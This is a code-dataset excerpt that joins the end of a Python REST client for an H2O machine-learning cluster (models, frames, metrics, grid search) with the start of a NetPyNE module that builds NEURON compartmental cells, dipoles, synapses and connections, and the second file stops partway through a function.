assert frame is not None, 'FAIL: "frame" parameter is null'
models = self.models(key=model, timeoutSecs=timeoutSecs)
assert models is not None, "FAIL: /Models REST call failed"
assert models['models'][0]['model_id']['name'] == model, "FAIL: /Models/{0} returned Model {1} rather than Model {2}".format(model, models['models'][0]['model_id']['name'], model)
# TODO: test this assert, I don't think this is working. . .
frames = self.frames(key=frame)
assert frames is not None, "FAIL: /Frames/{0} REST call failed".format(frame)
assert frames['frames'][0]['frame_id']['name'] == frame, "FAIL: /Frames/{0} returned Frame {1} rather than Frame {2}".format(frame, frames['frames'][0]['frame_id']['name'], frame)
result = self.__do_json_request('/3/ModelMetrics/models/' + model + '/frames/' + frame, cmd='post', timeout=timeoutSecs)
mm = result['model_metrics'][0]
H2O.verboseprint("model metrics: " + repr(mm))
return mm
def predict(self, model, frame, predictions_frame = None, timeoutSecs=60, **kwargs):
assert model is not None, 'FAIL: "model" parameter is null'
assert frame is not None, 'FAIL: "frame" parameter is null'
models = self.models(key=model, timeoutSecs=timeoutSecs)
# print("models (key={0}): ".format(model))
# pprint.PrettyPrinter(indent=4).pprint(models)
assert models is not None, "FAIL: /Models REST call failed"
assert models['models'][0]['model_id']['name'] == model, "FAIL: /Models/{0} returned Model {1} rather than Model {2}".format(model, models['models'][0]['model_id']['name'], model)
# TODO: test this assert, I don't think this is working. . .
frames = self.frames(key=frame)
assert frames is not None, "FAIL: /Frames/{0} REST call failed".format(frame)
assert frames['frames'][0]['frame_id']['name'] == frame, "FAIL: /Frames/{0} returned Frame {1} rather than Frame {2}".format(frame, frames['frames'][0]['frame_id']['name'], frame)
postData = { 'predictions_frame': predictions_frame }
result = self.__do_json_request('/3/Predictions/models/' + model + '/frames/' + frame, cmd='post', postData=postData, timeout=timeoutSecs)
return result
'''
ModelMetrics list.
'''
def model_metrics(self, model=None, frame=None, timeoutSecs=60, **kwargs):
if model is None and frame is None:
result = self.__do_json_request('/3/ModelMetrics', cmd='get', timeout=timeoutSecs)
elif model is not None and frame is not None:
result = self.__do_json_request('/3/ModelMetrics/models/' + model + '/frames/' + frame, cmd='get', timeout=timeoutSecs)
else:
raise ValueError("model_metrics can't yet handle the filter case")
return result
'''
Delete ModelMetrics.
'''
def delete_model_metrics(self, model, frame, timeoutSecs=60, **kwargs):
assert model is not None, 'FAIL: "model" parameter is null'
assert frame is not None, 'FAIL: "frame" parameter is null'
result = self.__do_json_request('/3/ModelMetrics/models/' + model + '/frames/' + frame, cmd='delete', timeout=timeoutSecs)
return result
'''
Return all of the models in the h2o cluster, or a single model given its key.
The models are contained in a list called "models" at the top level of the
result. Currently the list is unordered.
TODO:
When find_compatible_frames is implemented then the top level
dict will also contain a "frames" list.
'''
def models(self, api_version=3, key=None, timeoutSecs=20, **kwargs):
params_dict = {
'find_compatible_frames': False
}
h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'models', H2O.verbose)
if key:
result = self.__do_json_request(str(api_version) + '/Models/' + key, timeout=timeoutSecs, params=params_dict)
else:
result = self.__do_json_request(str(api_version) + '/Models', timeout=timeoutSecs, params=params_dict)
return result
'''
Delete a model on the h2o cluster, given its key.
'''
def delete_model(self, key, ignoreMissingKey=True, timeoutSecs=60, **kwargs):
assert key is not None, 'FAIL: "key" parameter is null'
result = self.__do_json_request('/3/Models/' + key, cmd='delete', timeout=timeoutSecs)
# TODO: look for what?
if not ignoreMissingKey and 'f00b4r' in result:
raise ValueError('Model key not found: ' + key)
return result
'''
Delete all models on the h2o cluster.
'''
def delete_models(self, timeoutSecs=60, **kwargs):
parameters = { }
result = self.__do_json_request('/3/Models', cmd='delete', timeout=timeoutSecs)
return result
'''
Return all of the grid search results in the h2o cluster.
The grid IDs are contained in a list called "grids" at the top level of the
result. Currently the list is unordered.
'''
def grids(self, api_version=99, timeoutSecs=20, **kwargs):
params_dict = {
}
h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'grids', H2O.verbose)
result = self.__do_json_request(str(api_version) + '/Grids', timeout=timeoutSecs, params=params_dict)
return result
'''
Return a grid search result from the h2o cluster given its key.
The models IDs are contained in a list called "model_ids" at the top level of the
result. Currently the list is unordered.
'''
def grid(self, api_version=99, key=None, timeoutSecs=20, **kwargs):
params_dict = {
'sort_by': None,
'decreasing': None
}
h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'grids', H2O.verbose)
if key:
result = self.__do_json_request(str(api_version) + '/Grids/' + key, timeout=timeoutSecs, params=params_dict)
else:
raise ValueError('Grid key not given: ' + key)
return result
'''
Fetch the list of REST API endpoints.
'''
def endpoints(self, timeoutSecs=60, **kwargs):
parameters = { }
result = self.__do_json_request('/3/Metadata/endpoints', cmd='get', timeout=timeoutSecs)
return result
'''
Fetch the metadata for the given numbered REST API endpoint.
'''
def endpoint_by_number(self, num, timeoutSecs=60, **kwargs):
parameters = { }
result = self.__do_json_request('/3/Metadata/endpoints/' + str(num), cmd='get', timeout=timeoutSecs)
return result
'''
Fetch the list of REST API schemas.
'''
def schemas(self, timeoutSecs=60, **kwargs):
parameters = { }
result = self.__do_json_request('/3/Metadata/schemas', cmd='get', timeout=timeoutSecs)
return result
'''
Fetch the metadata for the given named REST API schema (e.g., FrameV3).
'''
def schema(self, schemaname, timeoutSecs=60, **kwargs):
parameters = { }
result = self.__do_json_request('/3/Metadata/schemas/' + schemaname, cmd='get', timeout=timeoutSecs)
return result
'''
def grid(self, algo, parameters, hyperParameters, timeoutSecs=60, asynchronous=False, **kwargs):
assert algo is not None, 'FAIL: "algo" parameter is null'
assert parameters is not None, 'FAIL: "parameters" parameter is null'
gridParams = parameters
gridParams['grid_parameters'] = json.dumps(hyperParameters)
result = self.__do_json_request('/99/Grid/' + algo, cmd='post', postData=gridParams, raiseIfNon200=False)
if asynchronous:
return result
elif result['__http_response']['status_code'] != 200:
return result
else:
assert 'job' in result, "FAIL: did not find job key in model build result: " + repr(result)
job = result['job']
job_key = job['key']['name']
H2O.verboseprint("grid search job_key: " + repr(job_key))
job_json = self.poll_job(job_key, timeoutSecs=timeoutSecs)
return result
'''
|
YzPaul3/h2o-3
|
py/h2o.py
|
Python
|
apache-2.0
| 46,466
|
[
"Gaussian"
] |
90148baf5ca32fae738ec681f67b5a8b15f3e110c130fa25da3fa1df87927d1a
|
"""
cell/compartCell.py
Contains compartCell class
Contributors: salvadordura@gmail.com
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
from builtins import super
from builtins import next
from builtins import zip
from builtins import range
from builtins import round
from builtins import str
try:
basestring
except NameError:
basestring = str
from future import standard_library
standard_library.install_aliases()
from numbers import Number
from copy import deepcopy
from neuron import h # Import NEURON
import numpy as np
from math import sin, cos
from .cell import Cell
from ..specs import Dict
###############################################################################
#
# COMPARTMENTAL CELL CLASS
#
###############################################################################
# --- Temporarily copied from HNN code; improve so doesn't use h globals ---
# global variables for dipole calculation, should be node-independent
h("dp_total_L2 = 0."); h("dp_total_L5 = 0.") # put here since these variables used in cells
class CompartCell (Cell):
''' Class for section-based neuron models '''
def __init__ (self, gid, tags, create=True, associateGid=True):
super(CompartCell, self).__init__(gid, tags)
self.secs = Dict() # dict of sections
self.secLists = Dict() # dict of sectionLists
if create: self.create() # create cell
if associateGid: self.associateGid() # register cell for this node
def create (self):
from .. import sim
# generate random rotation angle for each cell
if sim.net.params.rotateCellsRandomly:
if isinstance(sim.net.params.rotateCellsRandomly, list):
[rotMin, rotMax] = sim.net.params.rotateCellsRandomly
else:
[rotMin, rotMax] = 0, 6.2832
rand = h.Random()
rand.Random123(self.gid)
self.randRotationAngle = rand.uniform(0, 6.2832) # 0 to 2pi
for propLabel, prop in sim.net.params.cellParams.items(): # for each set of cell properties
conditionsMet = 1
for (condKey,condVal) in prop['conds'].items(): # check if all conditions are met
if isinstance(condVal, list):
if isinstance(condVal[0], Number):
if self.tags.get(condKey) < condVal[0] or self.tags.get(condKey) > condVal[1]:
conditionsMet = 0
break
elif isinstance(condVal[0], basestring):
if self.tags.get(condKey) not in condVal:
conditionsMet = 0
break
elif self.tags.get(condKey) != condVal:
conditionsMet = 0
break
if conditionsMet: # if all conditions are met, set values for this cell
if sim.cfg.includeParamsLabel:
if 'label' not in self.tags:
self.tags['label'] = [propLabel] # create list of property sets
else:
self.tags['label'].append(propLabel) # add label of cell property set to list of property sets for this cell
if sim.cfg.createPyStruct:
self.createPyStruct(prop)
if sim.cfg.createNEURONObj:
self.createNEURONObj(prop) # add sections, mechanisms, synaptic mechanisms, geometry and topolgy specified by this property set
def modify (self, prop):
from .. import sim
conditionsMet = 1
for (condKey,condVal) in prop['conds'].items(): # check if all conditions are met
if condKey=='label':
if condVal not in self.tags['label']:
conditionsMet = 0
break
elif isinstance(condVal, list):
if isinstance(condVal[0], Number):
if self.tags.get(condKey) < condVal[0] or self.tags.get(condKey) > condVal[1]:
conditionsMet = 0
break
elif isinstance(condVal[0], basestring):
if self.tags.get(condKey) not in condVal:
conditionsMet = 0
break
elif self.tags.get(condKey) != condVal:
conditionsMet = 0
break
if conditionsMet: # if all conditions are met, set values for this cell
if sim.cfg.createPyStruct:
self.createPyStruct(prop)
if sim.cfg.createNEURONObj:
self.createNEURONObj(prop) # add sections, mechanisms, synaptic mechanisms, geometry and topolgy specified by this property set
def createPyStruct (self, prop):
from .. import sim
# set params for all sections
for sectName,sectParams in prop['secs'].items():
# create section
if sectName not in self.secs:
self.secs[sectName] = Dict() # create section dict
sec = self.secs[sectName] # pointer to section
# add distributed mechanisms
if 'mechs' in sectParams:
for mechName,mechParams in sectParams['mechs'].items():
if 'mechs' not in sec:
sec['mechs'] = Dict()
if mechName not in sec['mechs']:
sec['mechs'][mechName] = Dict()
for mechParamName,mechParamValue in mechParams.items(): # add params of the mechanism
sec['mechs'][mechName][mechParamName] = mechParamValue
# add ion info
if 'ions' in sectParams:
for ionName,ionParams in sectParams['ions'].items():
if 'ions' not in sec:
sec['ions'] = Dict()
if ionName not in sec['ions']:
sec['ions'][ionName] = Dict()
for ionParamName,ionParamValue in ionParams.items(): # add params of the ion
sec['ions'][ionName][ionParamName] = ionParamValue
# add synMechs
if 'synMechs' in sectParams:
for synMech in sectParams['synMechs']:
if 'label' in synMech and 'loc' in synMech:
self.addSynMech(synLabel=synMech['label'], secLabel=sectName, loc=synMech['loc'])
# add point processes
if 'pointps' in sectParams:
for pointpName,pointpParams in sectParams['pointps'].items():
#if self.tags['cellModel'] == pointpName: # only required if want to allow setting various cell models in same rule
if 'pointps' not in sec:
sec['pointps'] = Dict()
if pointpName not in sec['pointps']:
sec['pointps'][pointpName] = Dict()
for pointpParamName,pointpParamValue in pointpParams.items(): # add params of the mechanism
if pointpParamValue == 'gid':
pointpParamValue = self.gid
sec['pointps'][pointpName][pointpParamName] = pointpParamValue
# add geometry params
if 'geom' in sectParams:
for geomParamName,geomParamValue in sectParams['geom'].items():
if 'geom' not in sec:
sec['geom'] = Dict()
if not type(geomParamValue) in [list, dict]: # skip any list or dic params
sec['geom'][geomParamName] = geomParamValue
# add 3d geometry
if 'pt3d' in sectParams['geom']:
if 'pt3d' not in sec['geom']:
sec['geom']['pt3d'] = []
for ipt, pt3d in enumerate(sectParams['geom']['pt3d']):
if sim.net.params.rotateCellsRandomly == True:
"""Rotate the cell about the Z axis."""
x = pt3d[0]
z = pt3d[2]
c = cos(self.randRotationAngle)
s = sin(self.randRotationAngle)
pt3d = (x * c - z * s, pt3d[1], x * s + z * c, pt3d[3])
sectParams['geom']['pt3d'][ipt] = pt3d
sec['geom']['pt3d'].append(pt3d)
# add topolopgy params
if 'topol' in sectParams:
if 'topol' not in sec:
sec['topol'] = Dict()
for topolParamName,topolParamValue in sectParams['topol'].items():
sec['topol'][topolParamName] = topolParamValue
# add other params
if 'spikeGenLoc' in sectParams:
sec['spikeGenLoc'] = sectParams['spikeGenLoc']
if 'vinit' in sectParams:
sec['vinit'] = sectParams['vinit']
if 'weightNorm' in sectParams:
sec['weightNorm'] = sectParams['weightNorm']
if 'threshold' in sectParams:
sec['threshold'] = sectParams['threshold']
# add sectionLists
if 'secLists' in prop:
self.secLists.update(prop['secLists']) # diction of section lists
def initV (self):
for sec in list(self.secs.values()):
if 'vinit' in sec:
sec['hObj'].v = sec['vinit']
# Create dictionary of section names with entries to scale section lengths to length along z-axis
def __dipoleGetSecLength (self, secName):
L = 1
# basal_2 and basal_3 at 45 degree angle to z-axis.
if 'basal_2' in secName:
L = np.sqrt(2) / 2.
elif 'basal_3' in secName:
L = np.sqrt(2) / 2.
# apical_oblique at 90 perpendicular to z-axis
elif 'apical_oblique' in secName:
L = 0.
# All basalar dendrites extend along negative z-axis
if 'basal' in secName:
L = -L
return L
# insert dipole in section
def __dipoleInsert(self, secName, sec):
# insert dipole mech (dipole.mod)
try:
sec['hObj'].insert('dipole')
except:
print('Error inserting dipole mechanism')
return -1
# insert Dipole point process (dipole_pp.mod)
try:
sec['hDipole_pp'] = h.Dipole(1.0, sec = sec['hObj'])
except:
print('Error inserting Dipole point process')
return -1
dpp = sec['hDipole_pp']
# assign internal resistance values to dipole point process (dpp)
dpp.ri = h.ri(1, sec=sec['hObj'])
# sets pointers in dipole mod file to the correct locations -- h.setpointer(ref, ptr, obj)
h.setpointer(sec['hObj'](0.99)._ref_v, 'pv', dpp)
if self.tags['cellType'].startswith('L2'):
h.setpointer(h._ref_dp_total_L2, 'Qtotal', dpp)
elif self.tags['cellType'].startswith('L5'):
h.setpointer(h._ref_dp_total_L5, 'Qtotal', dpp)
# gives INTERNAL segments of the section, non-endpoints
# creating this because need multiple values simultaneously
loc = np.array([seg.x for seg in sec['hObj']])
# these are the positions, including 0 but not L
pos = np.array([seg.x for seg in sec['hObj'].allseg()])
# diff in yvals, scaled against the pos np.array. y_long as in longitudinal
y_scale = (self.__dipoleGetSecLength(secName) * sec['hObj'].L) * pos
# y_long = (h.y3d(1, sec=sect) - h.y3d(0, sec=sect)) * pos
# diff values calculate length between successive section points
y_diff = np.diff(y_scale)
for i in range(len(loc)):
# assign the ri value to the dipole
sec['hObj'](loc[i]).dipole.ri = h.ri(loc[i], sec=sec['hObj'])
# range variable 'dipole'
# set pointers to previous segment's voltage, with boundary condition
if i > 0:
h.setpointer(sec['hObj'](loc[i-1])._ref_v, 'pv', sec['hObj'](loc[i]).dipole)
else:
h.setpointer(sec['hObj'](0)._ref_v, 'pv', sec['hObj'](loc[i]).dipole)
# set aggregate pointers
h.setpointer(dpp._ref_Qsum, 'Qsum', sec['hObj'](loc[i]).dipole)
if self.tags['cellType'].startswith('L2'):
h.setpointer(h._ref_dp_total_L2, 'Qtotal', sec['hObj'](loc[i]).dipole)
elif self.tags['cellType'].startswith('L5'):
h.setpointer(h._ref_dp_total_L5, 'Qtotal', sec['hObj'](loc[i]).dipole)
# add ztan values
sec['hObj'](loc[i]).dipole.ztan = y_diff[i]
# set the pp dipole's ztan value to the last value from y_diff
dpp.ztan = y_diff[-1]
def createNEURONObj (self, prop):
from .. import sim
excludeMechs = ['dipole'] # dipole is special case
mechInsertError = False # flag to print error inserting mechanisms
# set params for all sections
for sectName,sectParams in prop['secs'].items():
# create section
if sectName not in self.secs:
self.secs[sectName] = Dict() # create sect dict if doesn't exist
if 'hObj' not in self.secs[sectName] or self.secs[sectName]['hObj'] in [None, {}, []]:
self.secs[sectName]['hObj'] = h.Section(name=sectName, cell=self) # create h Section object
sec = self.secs[sectName] # pointer to section
# set geometry params
if 'geom' in sectParams:
for geomParamName,geomParamValue in sectParams['geom'].items():
if not type(geomParamValue) in [list, dict]: # skip any list or dic params
setattr(sec['hObj'], geomParamName, geomParamValue)
# set 3d geometry
if 'pt3d' in sectParams['geom']:
h.pt3dclear(sec=sec['hObj'])
if sim.cfg.pt3dRelativeToCellLocation:
x = self.tags['x']
y = -self.tags['y'] if sim.cfg.invertedYCoord else self.tags['y'] # Neuron y-axis positive = upwards, so assume pia=0 and cortical depth = neg
z = self.tags['z']
else:
x = y = z = 0
for pt3d in sectParams['geom']['pt3d']:
h.pt3dadd(x+pt3d[0], y+pt3d[1], z+pt3d[2], pt3d[3], sec=sec['hObj'])
# add distributed mechanisms
if 'mechs' in sectParams:
for mechName,mechParams in sectParams['mechs'].items():
if mechName not in sec['mechs']:
sec['mechs'][mechName] = Dict()
try:
sec['hObj'].insert(mechName)
except:
mechInsertError = True
if sim.cfg.verbose:
print('# Error inserting %s mechanims in %s section! (check mod files are compiled)'%(mechName, sectName))
continue
for mechParamName,mechParamValue in mechParams.items(): # add params of the mechanism
mechParamValueFinal = mechParamValue
for iseg,seg in enumerate(sec['hObj']): # set mech params for each segment
if type(mechParamValue) in [list]:
if len(mechParamValue) == 1:
mechParamValueFinal = mechParamValue[0]
else:
mechParamValueFinal = mechParamValue[iseg]
if mechParamValueFinal is not None: # avoid setting None values
setattr(getattr(seg, mechName), mechParamName,mechParamValueFinal)
# add ions
if 'ions' in sectParams:
for ionName,ionParams in sectParams['ions'].items():
if ionName not in sec['ions']:
sec['ions'][ionName] = Dict()
try:
sec['hObj'].insert(ionName+'_ion') # insert mechanism
except:
mechInsertError = True
if sim.cfg.verbose:
print('# Error inserting %s ion in %s section!'%(ionName, sectName))
continue
for ionParamName,ionParamValue in ionParams.items(): # add params of the mechanism
ionParamValueFinal = ionParamValue
for iseg,seg in enumerate(sec['hObj']): # set ion params for each segment
if type(ionParamValue) in [list]:
ionParamValueFinal = ionParamValue[iseg]
if ionParamName == 'e':
setattr(seg, ionParamName+ionName, ionParamValueFinal)
elif ionParamName == 'o':
setattr(seg, '%so'%ionName, ionParamValueFinal)
h('%so0_%s_ion = %s'%(ionName,ionName,ionParamValueFinal)) # e.g. cao0_ca_ion, the default initial value
elif ionParamName == 'i':
setattr(seg, '%si'%ionName, ionParamValueFinal)
h('%si0_%s_ion = %s'%(ionName,ionName,ionParamValueFinal)) # e.g. cai0_ca_ion, the default initial value
#if sim.cfg.verbose: print("Updated ion: %s in %s, e: %s, o: %s, i: %s" % \
# (ionName, sectName, seg.__getattribute__('e'+ionName), seg.__getattribute__(ionName+'o'), seg.__getattribute__(ionName+'i')))
# add synMechs (only used when loading)
if 'synMechs' in sectParams:
for synMech in sectParams['synMechs']:
if 'label' in synMech and 'loc' in synMech:
self.addSynMech(synLabel=synMech['label'], secLabel=sectName, loc=synMech['loc'])
# add point processes
if 'pointps' in sectParams:
for pointpName,pointpParams in sectParams['pointps'].items():
#if self.tags['cellModel'] == pointpParams: # only required if want to allow setting various cell models in same rule
if pointpName not in sec['pointps']:
sec['pointps'][pointpName] = Dict()
pointpObj = getattr(h, pointpParams['mod'])
loc = pointpParams['loc'] if 'loc' in pointpParams else 0.5 # set location
sec['pointps'][pointpName]['hObj'] = pointpObj(loc, sec = sec['hObj']) # create h Pointp object (eg. h.Izhi2007b)
for pointpParamName,pointpParamValue in pointpParams.items(): # add params of the point process
if pointpParamValue == 'gid':
pointpParamValue = self.gid
if pointpParamName not in ['mod', 'loc', 'vref', 'synList'] and not pointpParamName.startswith('_'):
setattr(sec['pointps'][pointpName]['hObj'], pointpParamName, pointpParamValue)
if 'params' in self.tags.keys(): # modify cell specific params
for pointpParamName,pointpParamValue in self.tags['params'].items():
setattr(sec['pointps'][pointpName]['hObj'], pointpParamName, pointpParamValue)
# set topology
for sectName,sectParams in prop['secs'].items(): # iterate sects again for topology (ensures all exist)
sec = self.secs[sectName] # pointer to section # pointer to child sec
if 'topol' in sectParams:
if sectParams['topol']:
sec['hObj'].connect(self.secs[sectParams['topol']['parentSec']]['hObj'], sectParams['topol']['parentX'], sectParams['topol']['childX']) # make topol connection
# add dipoles
for sectName,sectParams in prop['secs'].items():
sec = self.secs[sectName]
if 'mechs' in sectParams and 'dipole' in sectParams['mechs']:
self.__dipoleInsert(sectName, sec) # add dipole mechanisms to each section
# Print message about error inserting mechanisms
if mechInsertError:
print("ERROR: Some mechanisms and/or ions were not inserted (for details run with cfg.verbose=True). Make sure the required mod files are compiled.")
def addSynMechsNEURONObj(self):
# set params for all sections
for sectName,sectParams in self.secs.items():
# add synMechs (only used when loading)
if 'synMechs' in sectParams:
for synMech in sectParams['synMechs']:
if 'label' in synMech and 'loc' in synMech:
self.addSynMech(synLabel=synMech['label'], secLabel=sectName, loc=synMech['loc'])
# Create NEURON objs for conns and syns if included in prop (used when loading)
def addStimsNEURONObj(self):
# assumes python structure exists
for stimParams in self.stims:
if stimParams['type'] == 'NetStim':
self.addNetStim(stimParams, stimContainer=stimParams)
elif stimParams['type'] in ['IClamp', 'VClamp', 'SEClamp', 'AlphaSynapse']:
stim = getattr(h, stimParams['type'])(self.secs[stimParams['sec']]['hObj'](stimParams['loc']))
stimProps = {k:v for k,v in stimParams.items() if k not in ['label', 'type', 'source', 'loc', 'sec', 'hObj']}
for stimPropName, stimPropValue in stimProps.items(): # set mechanism internal stimParams
if isinstance(stimPropValue, list):
if stimPropName == 'amp':
for i,val in enumerate(stimPropValue):
stim.amp[i] = val
elif stimPropName == 'dur':
for i,val in enumerate(stimPropValue):
stim.dur[i] = val
#setattr(stim, stimParamName._ref_[0], stimParamValue[0])
else:
setattr(stim, stimPropName, stimPropValue)
stimParams['hObj'] = stim # add stim object to dict in stims list
# Create NEURON objs for conns and syns if included in prop (used when loading)
def addConnsNEURONObj(self):
# Note: loading connections to point process (eg. Izhi2007a) not yet supported
# Note: assumes weight is in index 0 (netcon.weight[0])
from .. import sim
# assumes python structure exists
for conn in self.conns:
# set postsyn target
synMech = next((synMech for synMech in self.secs[conn['sec']]['synMechs'] if synMech['label']==conn['synMech'] and synMech['loc']==conn['loc']), None)
if not synMech:
synMech = self.addSynMech(conn['synMech'], conn['sec'], conn['loc'])
#continue # go to next conn
try:
postTarget = synMech['hObj']
except:
print('\nError: no synMech available for conn: ', conn)
print(' cell tags: ',self.tags)
print(' cell synMechs: ',self.secs[conn['sec']]['synMechs'])
import sys
sys.exit()
# create NetCon
if conn['preGid'] == 'NetStim':
netstim = next((stim['hObj'] for stim in self.stims if stim['source']==conn['preLabel']), None)
if netstim:
netcon = h.NetCon(netstim, postTarget)
else: continue
else:
#cell = next((c for c in sim.net.cells if c.gid == conn['preGid']), None)
netcon = sim.pc.gid_connect(conn['preGid'], postTarget)
netcon.weight[0] = conn['weight']
netcon.delay = conn['delay']
#netcon.threshold = conn.get('threshold', sim.net.params.defaultThreshold)
conn['hObj'] = netcon
# Add plasticity
if conn.get('plast'):
self._addConnPlasticity(conn['plast'], self.secs[conn['sec']], netcon, 0)
def associateGid (self, threshold = None):
from .. import sim
if self.secs:
if sim.cfg.createNEURONObj:
sim.pc.set_gid2node(self.gid, sim.rank) # this is the key call that assigns cell gid to a particular node
sec = next((secParams for secName,secParams in self.secs.items() if 'spikeGenLoc' in secParams), None) # check if any section has been specified as spike generator
if sec:
loc = sec['spikeGenLoc'] # get location of spike generator within section
else:
#sec = self.secs['soma'] if 'soma' in self.secs else self.secs[self.secs.keys()[0]] # use soma if exists, otherwise 1st section
sec = next((sec for secName, sec in self.secs.items() if len(sec['topol']) == 0), self.secs[list(self.secs.keys())[0]]) # root sec (no parents)
loc = 0.5
nc = None
if 'pointps' in sec: # if no syns, check if point processes with 'vref' (artificial cell)
for pointpName, pointpParams in sec['pointps'].items():
if 'vref' in pointpParams:
nc = h.NetCon(getattr(sec['pointps'][pointpName]['hObj'], '_ref_'+pointpParams['vref']), None, sec=sec['hObj'])
break
if not nc: # if still haven't created netcon
nc = h.NetCon(sec['hObj'](loc)._ref_v, None, sec=sec['hObj'])
if 'threshold' in sec: threshold = sec['threshold']
threshold = threshold if threshold is not None else sim.net.params.defaultThreshold
nc.threshold = threshold
sim.pc.cell(self.gid, nc, 1) # associate a particular output stream of events
del nc # discard netcon
sim.net.gid2lid[self.gid] = len(sim.net.gid2lid)
def addSynMech (self, synLabel, secLabel, loc):
from .. import sim
synMechParams = sim.net.params.synMechParams.get(synLabel) # get params for this synMech
sec = self.secs.get(secLabel, None)
# add synaptic mechanism to python struct
if 'synMechs' not in sec or not isinstance(sec['synMechs'], list):
sec['synMechs'] = []
if synMechParams and sec: # if both the synMech and the section exist
if sim.cfg.createPyStruct and sim.cfg.addSynMechs:
synMech = next((synMech for synMech in sec['synMechs'] if synMech['label']==synLabel and synMech['loc']==loc), None)
if not synMech: # if synMech not in section, then create
synMech = Dict({'label': synLabel, 'loc': loc})
for paramName, paramValue in synMechParams.items():
synMech[paramName] = paramValue
sec['synMechs'].append(synMech)
else:
synMech = None
if sim.cfg.createNEURONObj and sim.cfg.addSynMechs:
# add synaptic mechanism NEURON objectes
if not synMech: # if pointer not created in createPyStruct, then check
synMech = next((synMech for synMech in sec['synMechs'] if synMech['label']==synLabel and synMech['loc']==loc), None)
if not synMech: # if still doesnt exist, then create
synMech = Dict()
sec['synMechs'].append(synMech)
if not synMech.get('hObj'): # if synMech doesn't have NEURON obj, then create
synObj = getattr(h, synMechParams['mod'])
synMech['hObj'] = synObj(loc, sec=sec['hObj']) # create h Syn object (eg. h.Exp2Syn)
for synParamName,synParamValue in synMechParams.items(): # add params of the synaptic mechanism
if synParamName not in ['label', 'mod', 'selfNetCon', 'loc']:
setattr(synMech['hObj'], synParamName, synParamValue)
elif synParamName == 'selfNetcon': # create self netcon required for some synapses (eg. homeostatic)
secLabelNetCon = synParamValue.get('sec', 'soma')
locNetCon = synParamValue.get('loc', 0.5)
secNetCon = self.secs.get(secLabelNetCon, None)
synMech['hObj'] = h.NetCon(secNetCon['hObj'](locNetCon)._ref_v, synMech[''], sec=secNetCon['hObj'])
for paramName,paramValue in synParamValue.items():
if paramName == 'weight':
synMech['hObj'].weight[0] = paramValue
elif paramName not in ['sec', 'loc']:
setattr(synMech['hObj'], paramName, paramValue)
else:
synMech = None
return synMech
def modifySynMechs (self, params):
from .. import sim
conditionsMet = 1
if 'cellConds' in params:
if conditionsMet:
for (condKey,condVal) in params['cellConds'].items(): # check if all conditions are met
# check if conditions met
if isinstance(condVal, list):
if self.tags.get(condKey) < condVal[0] or self.tags.get(condKey) > condVal[1]:
conditionsMet = 0
break
elif self.tags.get(condKey) != condVal:
conditionsMet = 0
break
if conditionsMet:
for secLabel,sec in self.secs.items():
for synMech in sec['synMechs']:
conditionsMet = 1
if 'conds' in params:
for (condKey,condVal) in params['conds'].items(): # check if all conditions are met
# check if conditions met
if condKey == 'sec':
if condVal != secLabel:
conditionsMet = 0
break
elif isinstance(condVal, list) and isinstance(condVal[0], Number):
if synMech.get(condKey) < condVal[0] or synMech.get(condKey) > condVal[1]:
conditionsMet = 0
break
elif isinstance(condVal, list) and isinstance(condVal[0], basestring):
if synMech.get(condKey) not in condVal:
conditionsMet = 0
break
elif synMech.get(condKey) != condVal:
conditionsMet = 0
break
if conditionsMet: # if all conditions are met, set values for this cell
exclude = ['conds', 'cellConds', 'label', 'mod', 'selfNetCon', 'loc']
for synParamName,synParamValue in {k: v for k,v in params.items() if k not in exclude}.items():
if sim.cfg.createPyStruct:
synMech[synParamName] = synParamValue
if sim.cfg.createNEURONObj:
try:
setattr(synMech['hObj'], synParamName, synParamValue)
except:
print('Error setting %s=%s on synMech' % (synParamName, str(synParamValue)))
def addConn (self, params, netStimParams = None):
from .. import sim
# threshold = params.get('threshold', sim.net.params.defaultThreshold) # depreacated -- use threshold in preSyn cell sec
if params.get('weight') is None: params['weight'] = sim.net.params.defaultWeight # if no weight, set default
if params.get('delay') is None: params['delay'] = sim.net.params.defaultDelay # if no delay, set default
if params.get('loc') is None: params['loc'] = 0.5 # if no loc, set default
if params.get('synsPerConn') is None: params['synsPerConn'] = 1 # if no synsPerConn, set default
# Warning if self connections
if params['preGid'] == self.gid:
if sim.cfg.allowSelfConns:
if sim.cfg.verbose: print(' Warning: created self-connection on cell gid=%d, section=%s '%(self.gid, params.get('sec')))
else:
if sim.cfg.verbose: print(' Error: attempted to create self-connection on cell gid=%d, section=%s '%(self.gid, params.get('sec')))
return # if self-connection return
# Get list of section labels
secLabels = self._setConnSections(params)
if secLabels == -1: return # if no section available exit func
# Weight
weights = self._setConnWeights(params, netStimParams, secLabels)
weightIndex = 0 # set default weight matrix index
# Delays
if isinstance(params['delay'],list):
delays = params['delay']
else:
delays = [params['delay']] * params['synsPerConn']
# Check if target is point process (artificial cell) with V not in section
pointp, weightIndex = self._setConnPointP(params, secLabels, weightIndex)
if pointp == -1: return
# Add synaptic mechanisms
if not pointp: # check not a point process
synMechs, synMechSecs, synMechLocs = self._setConnSynMechs(params, secLabels)
if synMechs == -1: return
# Adapt weight based on section weightNorm (normalization based on section location)
for i,(sec,loc) in enumerate(zip(synMechSecs, synMechLocs)):
if 'weightNorm' in self.secs[sec] and isinstance(self.secs[sec]['weightNorm'], list):
nseg = self.secs[sec]['geom']['nseg']
weights[i] = weights[i] * self.secs[sec]['weightNorm'][int(round(loc*nseg))-1]
# Create connections
for i in range(params['synsPerConn']):
if netStimParams:
netstim = self.addNetStim(netStimParams)
if params.get('gapJunction', False) == True: # only run for post gap junc (not pre)
preGapId = 1e9*sim.rank + sim.net.lastGapId # global index for presyn gap junc
postGapId = preGapId + 1 # global index for postsyn gap junc
sim.net.lastGapId += 2 # keep track of num of gap juncs in this node
if not getattr(sim.net, 'preGapJunctions', False):
sim.net.preGapJunctions = [] # if doesn't exist, create list to store presynaptic cell gap junctions
preGapParams = {'gid': params['preGid'],
'preGid': self.gid,
'sec': params.get('preSec', 'soma'),
'loc': params.get('preLoc', 0.5),
'weight': params['weight'],
'gapId': preGapId,
'preGapId': postGapId,
'synMech': params['synMech'],
'gapJunction': 'pre'}
sim.net.preGapJunctions.append(preGapParams) # add conn params to add pre gap junction later
# Python Structure
if sim.cfg.createPyStruct:
connParams = {k:v for k,v in params.items() if k not in ['synsPerConn']}
connParams['weight'] = weights[i]
connParams['delay'] = delays[i]
